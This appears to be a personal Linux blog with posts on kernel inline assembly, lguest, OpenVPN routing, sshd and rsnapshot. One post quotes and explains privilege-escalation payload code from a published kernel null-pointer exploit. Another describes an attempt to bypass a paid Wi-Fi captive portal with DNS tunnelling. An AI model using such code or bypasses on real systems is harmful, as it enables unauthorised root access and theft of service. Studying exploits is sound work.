Here are some things I learned while reading the Linux kernel source code(some of which took me a couple of hours of googling and searching through documentation, git commit posts, threads on lkml etc etc :P).

1)You cannot write extended toplevel inline assembly, ie when you want to use extended inline assembly to pass the value of some C variables or constants, you can only do it inside a function. And as I found out, someone had filed a bug at the GCC bugzilla. So something like this

static const char foo[] = "Hello, world!";
enum { bar = 17 };
asm(".pushsection baz; .long %c0, %c1, %c2; .popsection"
    : : "i" (foo), "i" (sizeof(foo)), "i" (bar));

won’t work.

2)I didn’t search very much the documentation about inline asm, but I couldn’t find what’s the difference between %c0 and %0. It’s used at the example code above, and in a kernel macro I saw. I understood that it had to do with some ‘constant casting’, but I couldn’t find anywhere the exact difference. So I wrote a simple piece of code to clarify that:

main() {
	asm("movl %0, %%eax; movl %c0, %%eax"
		:: "i" (0xff) );
}

and after

gcc -S foo.c

I get:

movl $255, %eax
movl 255, %eax

So %0 is used when we want an integer constant to be used as an immediate value in instructions like mov, add etc, which means that it should be prefixed with $, while %c0 is used when we want the number itself for instructions like .long, .size etc which demand an absolute expression/value as ‘arguments’.

3) When using the section attribute on a variable, in order to change the section it belongs, you cannot change the section’s type to nobits, it’ll be progbits by default. progbits means that the section will actually get space allocated inside the executable(like text and data sections), in contrast to nobits sections like bss for example.
i.e. you can’t do this

static char foo __attribute__(section("bar", nobits));

4)I also found out about the pushsection and popsections asm directives, which manipulate the ELF section stack, and seem to be very useful in certain occasions. pushsection obviously pushes the current section to the section stack, and replace it with the argument passed to the directive, while popsection replaces the current section with the section on top of the section stack.

5)Finally the ‘used’ attribute, which indicates that the symbol(function in our case) is actually used/called/referenced even if the compiler can’t ‘see’ it(otherwise I think that the compiler optimizations would omit code generation for that function).

And now a kernel macro which includes all of the above:

/*
 * Reserve space in the brk section.  The name must be unique within
 * the file, and somewhat descriptive.  The size is in bytes.  Must be
 * used at file scope.
 *
 * (This uses a temp function to wrap the asm so we can pass it the
 * size parameter; otherwise we wouldn't be able to.  We can't use a
 * "section" attribute on a normal variable because it always ends up
 * being @progbits, which ends up allocating space in the vmlinux
 * executable.)
 */
#define RESERVE_BRK(name,sz)						\
	static void __section(.discard.text) __used			\
	__brk_reservation_fn_##name##__(void) {				\
		asm volatile (						\
			".pushsection .brk_reservation,\"aw\",@nobits;" \
			".brk." #name ":"				\
			" 1:.skip %c0;"					\
			" .size .brk." #name ", . - 1b;"		\
			" .popsection"					\
			: : "i" (sz));					\
	}

And a bit more detailed explanation from the git commit

The C definition of RESERVE_BRK() ends up being more complex than
one would expect to work around a cluster of gcc infelicities:

The first attempt was to simply try putting __section(.brk_reservation)
on a variable. This doesn’t work because it ends up making it a
@progbits section, which gets actual space allocated in the vmlinux
executable.

The second attempt was to emit the space into a section using asm,
but gcc doesn’t allow arguments to be passed to file-level asm()
statements, making it hard to pass in the size.

The final attempt is to wrap the asm() in a function to allow
it to have arguments, and put the function itself into the
.discard section, which vmlinux*.lds drops entirely from the
emitted vmlinux.

Another thing to notice is that the wrapper function is put in the .discard.text section, which according to the vmlinux.lds(the linker script used to generate/link the vmlinux executable) will be discarded and thus not included in the executable.
From scripts/module-common.lds:

/*
 * Common module linker script, always used when linking a module.
 * Archs are free to supply their own linker scripts.  ld will
 * combine them automatically.
 */
SECTIONS {
	/DISCARD/ : { *(.discard) }
}

The purpose of the RESERVE_BRK macro, and the brk-like allocator for very early memory allocations needed during the kernel boot process is an interesting story too(which means another post coming soon)! ;)

Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux Kernel, which is mainly used for experimentation, and learning stuff about hypervisors, operating systems, even computer architecture/ISA(x86 in particular).

Today I cloned the git repo for the lguest64 port, and I started browsing through the documentation and the code. In the launcher code(the program that initializes/sets up and launches a new guest kernel), I saw the coolest programming hack/trick I’ve seen in a long time. :P

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 *
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *
 *  movl <some-address>, %eax
 *
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 *
 * In this example can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 *
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 *
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
{
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	}
	errx(1, "could not determine page offset");
}

It’s very well commented, and so I don’t think there’s something I could explain any better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ ;)

Gimme root!

February 17, 2011

I was looking at the Linux Kernel null-pointer dereferencing exploit in the /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came along some things I hadn’t seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. :P

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

Thus, I learned that the SVR4 personality(generally when the MMAP_PAGE_ZERO flag is set in the personality) maps the zero page, and fills it with zeros, and that’s why we use mprotect for SVR4, instead of mmap, since zero page is already mapped.

The gimme-root code, was also fun(spender did he best to mock SELinux :P). However the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}

where init_cred is the credential struct used by init(aka root :P), and commit_creds points to the kernel symbol/function which is used to manage credentials. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so instead maybe we could craft a new cred struct with uid/gid=0 and then call prepare_creds/commit_creds.

Afaik, this credential ‘framework’ was introduced with Linux Kernel 2.6.30, so spender provides another ‘old-school’ :P way to get root credentials, in older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	);
	return current;
}

static void old_style_gimme_root(void)
{
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;

	return;
}

which gets the current task’s stack, searches for our uids/gids, and then it sets them to 0(aka root :P).

The exploit itself is brilliant, and LWN has two very nice articles, which explain how the exploit actually works(although spender has commented more than enough–commenting on Linux Kernel security, full disclosure of security bugs etc etc).

So, only for Greeks, or people from other countries, who have travelled with Minoan Lines… :P

If you have ever travelled from Athens to Heraklion(or vice-versa :P) with a Minoan Lines ship, mabye you’ll notice that there’s a Wifi Hotspot, owned by Forthnet. If you try to use it, you’ll be presented with a Captive Portal.

In order to get access to the Internet, you have to pay some money(extremely overpriced, concidering the speed/bandwidth, although … you are in a ship :P).

I suppose Forthnet has many other hotspots, like this one, and I guess the prices are pretty much the same. Unless you are already a Forthnet customer(like I am). Then, you have free access.

But, even if you are a Forthnet customer, I think it’s fun! to find out if/how you can bypass this captive portal.

A month ago, I was travelling to Crete, so I tried some things, but everything phailed. :P

So, I googled a bit, and I found some interesting things.

Apparently, the best, if not the only, way to bypass the captive portal is DNS Tunneling.

However, the connection was awful, so SSHing to my server, and setting up the “customized” DNS server, was impossible.

So, I did all the preperations(DNS server modifications, etc…) while I was in Crete, and hoped I could test it when I’d travel back to Athens.

But, the Wifi Hotspot(specifically the Captive Portal “server” I think) was ‘down’, when I was travelling, so I couldn’t test DNS tunelling.

Maybe, next time.

Anyway, if anyone has tried it, let me know.

Although I think the bandwidth/speed will be terrible, considering the DNS tunelling overhead.

Btw, tricks like MAC/IP spoofing, ARP poisoning, hacking a poor Windoze unpatched user(etc etc), and setting up a NAT, are out of the question, since I wanted to ‘hack’ the hotspot/portal, and not the (l)users. :P

Ch(b)eers!

(to the hotspot admins! :P)

I wanted to understand how the code for the early page tables that the kernel builds just before paging is enabled, works. x86 AT&T assembly isn’t very easy to understand, but it’s fun though. :P

page_pde_offset = (__PAGE_OFFSET >> 20);

        movl $pa(__brk_base), %edi
        movl $pa(swapper_pg_dir), %edx
        movl $PTE_IDENT_ATTR, %eax
10:
        leal PDE_IDENT_ATTR(%edi),%ecx          /* Create PDE entry */
        movl %ecx,(%edx)                        /* Store identity PDE entry */
        movl %ecx,page_pde_offset(%edx)         /* Store kernel PDE entry */
        addl $4,%edx
        movl $1024, %ecx
11:
        stosl
        addl $0x1000,%eax
        loop 11b
        /*
         * End condition: we must map up to the end + MAPPING_BEYOND_END.
         */
        movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
        cmpl %ebp,%eax
        jb 10b
        addl $__PAGE_OFFSET, %edi
        movl %edi, pa(_brk_end)
        shrl $12, %eax
        movl %eax, pa(max_pfn_mapped)

Here’s the piece of code.
Have fun! :)

RFC mania

January 22, 2010

I had to do an SNMP-related excercise for the Network Management Lab. We had to write a MIB(Message Information Base) for a firewall, to describe the filters and the rules of the firewall.
The MIB should be written in SNMPv2 SMI, so I read some RFCs.
I never liked the RFCs, and now I think that they’re even more disgusting. :P
Actually, I think that people who are involved with the whole process of the RFCs have serious personal problems(just kidding :P).
And to prove that I have a point, a friend of mine reminded me of an epic RFC.
RFC 1149, or IP over Avian Carriers!!!!
And that’s not the worst part. There’s more!
Some people did an actual implementation of the RFC!
I knew about the RFC but not that there was an “implementation”. :P
About 10 years ago.
Link 1 and Link 2.
The highlight(besides the pigeons ofcourse) was the source code, and the ping times.

Ok, in fact, I would say that the whole thing was fun and maybe interesting, but the RFCs are still disgusting. :P
Except for RFCs like these :P
:D

OpenVPN/iptables/iproute2

January 19, 2010

Here’s the deal.
We have an OpenVPN server, part of a network, for instance network 10.0.0.0/24, and server’s IP 10.0.0.15.
We connect to the OpenVPN server, using [b]UDP[/b], and a virtual [b]tap[/b] interface, let’s say, tap0.
After we’ve connected successfully with the vpn server, we run a dhcp client on the tap0 interface, and get an IP inside the 10.0.0.0/24 network, let’s say 10.0.0.55.
Along with the IP assignment, a new route will be added in the routing table, a route to the network 10.0.0.0/24, with no gateway(=link), through the tap0 interface.
Howerver, now we can’t contact the OpenVPN server. After the new route is added all of our packets to the VPN server, including the vpn packets, will be routed through the tap0 interface, and therefore VPN will stop working.
So, we add to the routing a table a route to the vpn server(10.0.0.15), via our local gateway(for instance 192.168.1.1), through our physical network interface(for instance eth0).
Now, we can communicate with every other host inside the 10.0.0.0/24 network over a VPN encrypted channel. But all of our connections to the VPN server will go through the unencrypted channel(192.168.1.1/eth0 route, bypassing the VPN/tap0 interafce).
But that’s not what we actually want.
Actually, we want to communicate with the VPN server over the VPN ‘tunnel'(and through tap0) for all the connections we make, except for the VPN connection.
That’s possible if we use iptables and iproute2.
We’ll mark the packets of the VPN connection using iptables(ie the packets using UDP, with destination address the VPN server, and destination port the port to which the server listens — port 1194 most likely).
iptables -t mangle -A OUTPUT -p udp -d 10.0.0.15 --dport 1194 -j MARK --set-mark 1
Now, we’ll create a rule with iproute2, which will route the marked packets using a different routing table.
First we create the new table.
echo 200 vpn.out >> /etc/iproute2/rt_tables
We add the rule.
ip rule add fwmark 1 lookup vpn.out
And we add the route for the vpn server to the vpn.out table.
ip route add 10.0.0.15 via 192.168.1.1 dev eth0 table vpn.out
One last thing.
With this configuration, there’s a problem in the selection of the source address for the vpn packets to the vpn server. Because the marking and the change of the route is done later, VPN will see the “10.0.0.0/24, no gateway, dev tap0″ route in the main routing table, and will select the tap0 IP as the source address, which is obviously wrong since we want to get routed through the eth0 interface(with IP 192.168.1.2 for instance). This is fixed if we add the local 192.168.1.2 option in our vpn client configutaion file, so that OpenVPN binds to that address and selects it correctly as the source address.
That’s it!
We send only vpn packets through the 192.168.1.1/eth0 route, and everything else, including all other connections to the VPN server, are sent over vpn.
This ‘trick’ is very useful when you want to be able to ssh to the VPN server, but you want to prohibit ssh from IPs outside the local network.

~6k lines of C code, and you have a x86 hypervisor in the Linux kernel!

lguest is a very minimal x86 hypervisor for Linux, very easy to set up, and due to its very small code base, it can be fun to hack/tweak.

Besides its small code base, it’s very well documented, thus ‘studying’ the lguest code is probably the best way to start learning a few things about virtualization and hypervisors.

Actually, the Makefile in drivers/lguest/ can be used to ‘extract’ the comments from the lguest code, in a very organized way, which makes it even easier to understand how lguest works(just cd to the directory and type make Beer, or make Puppy, if you want some ascii puppies : )

lguest requires some kernel configuration. Except for lguest itself, you must include some virtio modules, particularly virtio_blk and virtio_net, if you need networking inside the guest.

Afterwards, you must compile the Documentation/lguest/lguest.c, which you’ll run in userspace every time you want to ‘launch’ a new guest.

In order to run a new guest, you just run the lguest launher you just compiled, with some parameters, like the amount of memory the guest should have, the kernel image(usually the same image, that the host runs) and/or the initrd needed, a rootfs(you can either download a minimal rootfs for testing, or create one using qemu), and the virtual block device(/dev/vda), where the rootfs will be mounted inside the guest.
i.e.
lguest 64m vmlinux --initrd=initrd.img --block=rootfile root=/dev/vda
That’s it! You have a guest running.

Of course lguest lacks features, included in other hypervisors/virtualization solutions, but that’s the point. A small ‘experimental’ hypervisor, easy to understand and maybe tweak. ;)

sshd + reverse DNS lookup

October 19, 2009

This post is mainly for ‘self reference’, in case something like this happens again.

According to the sshd man page, by default, sshd will perform a reverse DNS lookup, based on the client’s IP, for various reasons.

A reverse DNS lookup is used in order to add the hostname to the utmp file, that keeps track of the logins/logouts to the system. One way to ‘switch it off’ is by using the -u0 option when stating sshd. The -u option is used to specify the size of the field of the utmp structure that holds the remote host name.

A reverse lookup is also performed when the configuration(or the authentication mechainsm used) requires such a lookup. The HostBasedAuthentication auth mech, a “from=hostname” option in the .authorized_keys file, or the AllowUsers/DenyUsers option that includes hostnames, in the sshd_config, require a reverse DNS lookup.

Btw, the UseDNS option in the sshd_config, which I think is enable by default, will not prevent sshd from doing a reverse lookup, for the above mentioned reasons. However, if this option is set to ‘No’, sshd will not try to verify that the resolved hostname maps back to the same IP that the client provided(adding an extra ‘layer’ of security).

So, the point is that if for some reason the ‘primary’ namserver in the resolv.conf is not responding, you’ll experience a lag when trying to login using ssh, which can be confusing if you don’t know the whole reverse DNS story.

Another thing that I hadn’t thought before I learned about sshd reverse lookups, is that a DNS problem can easily ‘lock you out’ of a computer, if you use hostname based patterns with TCP wrappers(hosts.allow, hosts.deny). And maybe this can explain some “Connection closed by remote host” errors, when trying to login to a remote computer. :P

rsnapshot tips&tricks

July 19, 2009

rsnapshot is a great application for taking backups. It uses rsync and hard links, and makes backup management very easy. It comes with a nice perl script, rsnapreport, which reads the output of the rsync commands used by rsnapshot, and prints a useful report, with the stats of each rsync command.

For detailed info about rsnapshot, you can visit the website of the project.

A typical configuration would set up a cronjob, in which the output of the rsnapshot sync command(or rsnapshot daily, if the sync_first option is not enabled), is piped to rsnapreport, and the output of rsnapreport is piped to a CLI SMTP client, to send us a mail with the stats of the sync operation.(sendEmail is a very nice SMTP client ;) ).

However, if you’re taking backups from multiple machines, the sync operation can last longer than expected. So, if the datablock timeout in our SMTP server isn’t large enough, we will never get an email.

This is solved if we use a wrapper script for the rsnapshot sync operation. We use that script for the cronjob, and inside the script we have something like this:

#!/bin/sh
rsnapshot sync > /tmp/rsync_stats 2>&1
cat /tmp/rsync_stats | rsnapreport.pl | sendEmail -f backup@foo -t user@bar -u rsnapshot report
rm -f /tmp/rsync_stats

And problem solved! ;)

Follow

Get every new post delivered to your Inbox.

Join 276 other followers